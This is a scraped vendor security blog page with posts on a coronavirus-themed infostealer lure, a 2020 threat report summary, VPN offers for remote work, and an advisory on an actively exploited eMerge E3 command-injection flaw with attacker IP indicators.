Threat actors are misusing Coronavirus scare to spread malicious executable

/in /by

Today, everyone is aware about the deadly coronavirus (2019-nCoV) that was first reported from Wuhan – China, on 31 December 2019 and now spreading world wide. While the world is fighting against this deadly coronavirus and running various awareness campaigns and sharing document related to precautionary measures, cyber threat actors are taking this as an opportunity to get benefits from the fear of people by distributing malware files and claiming them as awareness supporting document for the coronavirus. SonicWall RTDMI ™ engine has recently detected an archive file which contains an executable file named “CoronaVirus_Safety_Measures.exe”.  The archive is delivered to the victim’s machine as an email attachment:

 

After diving deep into the executable file, we found that the file belongs to GOZ InfoStealer family which was first detected by SonicWall RTDMI ™ engine on Nov 22, 2019.

“The GOZ InfoStealer is known for stealing user data from installed applications, along with victim’s system information, which is then sent to the threat actor over Simple Mail Transfer Protocol”

The malware author is continuously updating the malware code and changing its infection chain. SonicWall CaptureLabs Threats Research team is continuously monitoring the malware variants:

First Variant:

This variant uses image stenography as a part of its infection chain and sends the stolen data to the malware author’s email address over Simple Mail Transfer Protocol (SMTP).

Second Variant:

The JavaScript file is delivered to the victim’s machine as an email attachment which drops and executes the GOZ InfoStealer. The major change observed in this variant is, the malware author is using his own email address for sending and receiving stolen data.

Recent Variant:

An AutoIt compiled binary is delivered to the victim’s machine inside an archive, as an email attachment which executes the GOZ InfoStealer on victim’s machine. The AutoIt compiled binary is named “CoronaVirus_Safety_Measures.exe” to mislead the victim.

Evidence of the detection by RTDMI engine can be seen below in the Capture ATP report for this file:

 

Additional Remark:

Please note that the RTDMI engine analyzed and gave us a verdict for these samples as ‘Malicious’ on February 04, 2020 as visible in the report:

 

Whereas the sample was first seen on Virustotal 8 hours later – on February 05, 2020 – as evident by the ‘First Submission’ date:

 

 

 

Inside Cybercriminal Inc.: SonicWall Exposes New Cyberattack Data, Threat Actor Behaviors in Latest Report

/0 Comments/in /by

For cybercriminals and threat actors, the digital frontier is a lawless panorama of targets and opportunity. Despite the best intentions of government agencies, law enforcement and oversight groups, the modern cyber threat landscape is more agile and evasive than ever before.

For this reason, SonicWall Capture Labs threat researchers work tirelessly to arm organizations, enterprises, governments and businesses with actionable threat intelligence to stay ahead in the global cyber arms race.

And part of that dedication starts with the 2020 SonicWall Cyber Threat Report, which provides critical threat intelligence to help you better understand how cybercriminals think — and be fully prepared for what they’ll do next.

Global Malware Dips, But More Targeted

For the last five years, cybercriminals overwhelmed organizations with sheer volume. But as cyber defenses evolved, more volume was not resulting in higher paydays. A change was in order.

In 2018, cybercriminals began to leverage more evasive and pointed attacks against “softer” targets. In 2019, global malware volume dipped, but attacks were more targeted with higher degrees of success, particularly against the healthcare industry, and state, provincial and local governments.

All told, SonicWall Capture Labs threat researchers recorded 9.9 billion malware attacks* in 2019 — a slight 6% year-over-year decrease.

Ransomware targets state, provincial and local governments

‘Spray and pray’ is over. Cybercriminals are using ransomware to surgically target victims that are more likely to pay given the sensitive data they possess or funds at their disposal (or both). Now it’s all about ‘big-game hunting.’

The report outlines the most egregious ransomware attacks of 2019, while also painting a picture of the evolution of ransomware families and signatures, including Cerber, GandCrab, HiddenTear and more.

Fileless malware spikes in Q3

Fileless malware is a type of malicious software that exists exclusively as a memory-based artifact (i.e., RAM). It does not write any part of its activity to the computer’s hard drive, making it very resistant to existing computer forensic strategies.

The use of fileless malware ebbed and flowed in 2019. But exclusive SonicWall data shows a massive mid-year spike for this savvy technique.

Encrypted threats growing consistently

Another year, another jump in the use of encrypted threats. Until more organizations proactively and responsibly inspect TLS/SSL traffic, this attack vector will only expand.

IoT malware volume rising

From hacked doorbell cameras to rogue nanny cams, 2019 was an alarming year for the security and privacy of IoT devices. Trending data suggests more IoT-based attacks are on the horizon.

Cryptojacking crumbles

In early 2019, the price of bitcoin and complementary cryptocurrencies created an untenable situation between Coinhive-based cryptojacking malware and the legitimate Coinhive mining service. The shuttering of the latter led to the virtual disappearance of one the year’s hottest malware.

Coronavirus Affecting Business as Remote Workforces Expand Beyond Expected Capacity

/3 Comments/in /by

The novel coronavirus epidemic is a major global health concern. To help prevent the spread of the new virus, organizations, businesses and enterprises are protecting their workforce and allowing employees to work remotely. This practice helps limit individual contact with large groups or crowds (e.g., restaurants, offices, transit) where viruses can easily spread.

As such, ‘stay at home’ is a common phrase in many health-conscious regions this week. According to the BBC, the city of Suzhou said businesses would remain closed until Feb 8, if not longer. As of 2018, Suzhou had a population of more than 10.7 million people.

On Jan. 30, the World Health Organization labeled the outbreak as a global health emergency. In response, the U.S. Department of issued a Level 4 travel advisory to China (do not travel).

Precautions like these are causing unexpected increases in mobile workers; many organizations don’t have enough virtual private network (VPN) licenses to accommodate the increase of users. This is a serious risk as employees will either not have access to business resources or, worse, they will do so via non-secure connections.

Organizations and enterprises in affected areas should review their business continuity plans. The National Law Review published a useful primer for employers and organizations managing workforces susceptible to coronavirus outbreaks. In addition, leverage SonicWall’s ‘5 Core Practices to Ensure Business Continuity.”

What is the coronavirus?

Coronavirus (2019-nCoV) is a respiratory illness first identified in Wuhan, China, but cases have since been reported in the U.S., Canada, Australia, Germany, France, Thailand, Japan, Hong Kong, and nine other countries. In an effort to contain the virus, the Chinese authorities have suspended air and rail travel in the area around Wuhan.

According to Centers for Disease Control and Prevention (CDC), early patients in the outbreak in China “reportedly had some link to a large seafood and animal market, suggesting animal-to-person spread. However, a growing number of patients reportedly have not had exposure to animal markets, indicating person-to-person spread is occurring. At this time, it’s unclear how easily or sustainably this virus is spreading between people.”

The latest situation summary updates are available via the CDC: 2019 Novel Coronavirus, Wuhan, China.

Work-from-Home VPN Solutions for Remote Workforces

To help organizations cost-effectively implement VPN technology for their rapidly expanding work-from-home employees, SonicWall is making its remote access products and services available to both new and existing customers via deeply discounted rates. We’re also bundling critical security solutions for new enterprise and SMB customers.

This special offer provides free Secure Mobile Access (SMA) virtual appliances sized for enterprises and SMBs, and also includes aggressive discounts on Cloud App Security and Capture Client endpoint protection when paired with SMA.

These packages were bundled to include everything needed to protect employees outside the network:

  • Free Secure Mobile Access (SMA) virtual appliance
  • Aggressive discounts on Capture Client endpoint protection
  • Aggressive discounts on Cloud App Security
  • Aggressive discounts on support contracts and Remote Implementation Services when you bundle a virtual appliance
  • New 30- and 60-day VPN spike licenses for existing SMA 100 and 1000 series customers

Linear eMerge E3 access controller actively being exploited

/in /by

Linear eMerge E3:

Nortek Security & Control, LLC (NSC) is a leader in wireless security, home automation, and personal safety systems and devices. Nortek Security and Control LLC’s Linear eMerge E3 is an access controller that specifies which doors a person can use to enter and exit designated places at specified times. It runs on embedded Linux Operating System and the system can be managed from a browser via embedded web server. These access systems are used for commercial, industrial, banking, medical, retail, hospitality, and other businesses where users need to secure their facilities.

Vulnerability | CVE-2019-7256:

A Command Injection vulnerability has been reported in eMerge E3-series access controller. This issue is triggered due to insufficient sanitizing of user-supplied inputs to a PHP function allowing arbitrary command execution with root privileges. A remote unauthenticated attacker can exploit this to execute arbitrary commands within the context of the application, via a crafted HTTP request.

Exploit:

SonicWall Capture Labs Threat Research team observe huge hits on our firewalls that attempt to exploit the command injection vulnerability with the below HTTP request.

Once the vulnerability is exploited successfully on the target, the following shell commands will be executed on the target system:

The above shell commands are used to download the malware and execute it on the exploited systems.

The malware then accepts commands from its C2 server to conduct various types of DoS attacks against any given target.

Affected:

Linear eMerge Elite/Essential Firmware version 1.00-06

Impact:

As per Applied Risk’s research report, a total number of 2,375 Internet-accessible eMerge devices are listed by the Shodan search engine; 600 for eMerge50P and 1775 for eMerge E3.

A quick search on Shodan exposes over 2000 linear devices.

An attacker can leverage an OS command injection vulnerability to alter or corrupt a database, steal customer records,  launch a distributed denial of service (DDoS) attack or even compromise other parts of the hosting infrastructure. The resulting damage is determined by the user authorizations and security protections that the organization has in place. In addition, attackers may retain access to the systems even after an organization has detected and fixed the underlying vulnerability.

Fix:
No patch available yet.
The exploitation is known to be easy, given the proof of concept code. The attack may be launched remotely and no form of authentication is required for exploitation.

In order to prevent this exploit, it may require blocking access to the vulnerable PHP script until a security patch is out or allow only a whitelist of permitted values.

After discovering that an OS command injection attack has taken place, it’s critical to cut off access to the compromised systems from the internal networks.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

IPS: 14767 Linear eMerge Remote Code Execution

WAF: 9012 System Command Injection Variant 2

Heat Map:

Attackers seem to be actively targeting these devices as we see tens of thousands of hits every day, targeting over 100 countries with the most attacks being observed in the U.S.

Trend Chart:

IOC’s:

We do not find these IP addresses associated with any specific threat actor and most of these are seen crawling the internet, looking for vulnerable services, attempting to brute force and exploit the IoT devices. A good amount of attacks originate from compromised devices like Webcam or DVR that indicates that it’s infected with a Conficker or Mirai-like variant of malware.

121.138.83.147
220.92.153.250
195.223.173.102
88.61.0.93
62.86.25.151
217.58.35.193
195.103.133.46
80.22.178.53
80.21.75.143
221.157.203.236
94.89.40.90
80.22.8.239
62.86.6.98
5.96.237.174
82.191.134.50
88.57.72.14
88.32.72.110
88.44.33.170
31.197.102.187
62.86.211.49
88.42.32.78
94.81.7.43
37.205.159.206
62.86.203.177
217.58.61.49
82.185.94.187
88.34.126.169
80.19.160.157
212.131.13.41
217.141.242.114
85.33.36.165
85.33.39.225
194.243.255.230
82.189.198.34
80.17.57.197
5.97.218.186
151.11.117.230
2.112.35.46
94.91.166.163
2.113.121.141
80.18.113.223
217.58.167.45
212.131.143.250
88.58.46.118
31.199.241.17
37.205.207.125
79.3.199.89
80.22.20.166
94.94.226.54
217.58.149.69
88.34.126.171
88.44.33.166
80.21.229.186
66.76.142.242
31.196.187.61
203.158.18.80
85.35.30.58
94.80.117.38
2.194.70.9
2.194.70.202
80.21.170.254
45.58.123.178
37.207.247.58
2.194.70.232
45.56.97.236
190.115.18.86
213.26.141.26
2.194.65.36
2.194.65.46
95.210.74.80
52.2.194.128
198.210.24.5
147.75.226.58
107.162.6.45
52.55.228.83
18.211.74.2
94.94.194.46
18.213.94.236
95.210.74.90
89.25.34.37
3.218.66.165
165.100.216.29
209.124.44.10
2.194.65.101
196.250.8.153
193.169.82.20
80.239.119.247
80.95.0.73
107.162.6.99
89.39.60.121
45.125.10.132
177.131.116.13
18.195.232.15
107.162.6.18
34.196.8.195
2.194.65.221
34.230.216.5
175.101.19.169
3.227.113.46
184.185.45.254
107.162.6.48
89.25.34.39
213.249.131.209
52.44.57.241
94.135.234.240
198.210.17.1
54.214.32.228
45.6.63.145
182.71.249.209
2.194.73.156
179.95.237.242
193.182.183.2
98.159.149.189
103.62.95.165
2.194.67.115
3.214.34.155
192.50.2.1
120.79.16.234
213.27.197.196
2.194.71.224
50.240.171.85
107.162.6.49
3.220.141.26
95.210.74.108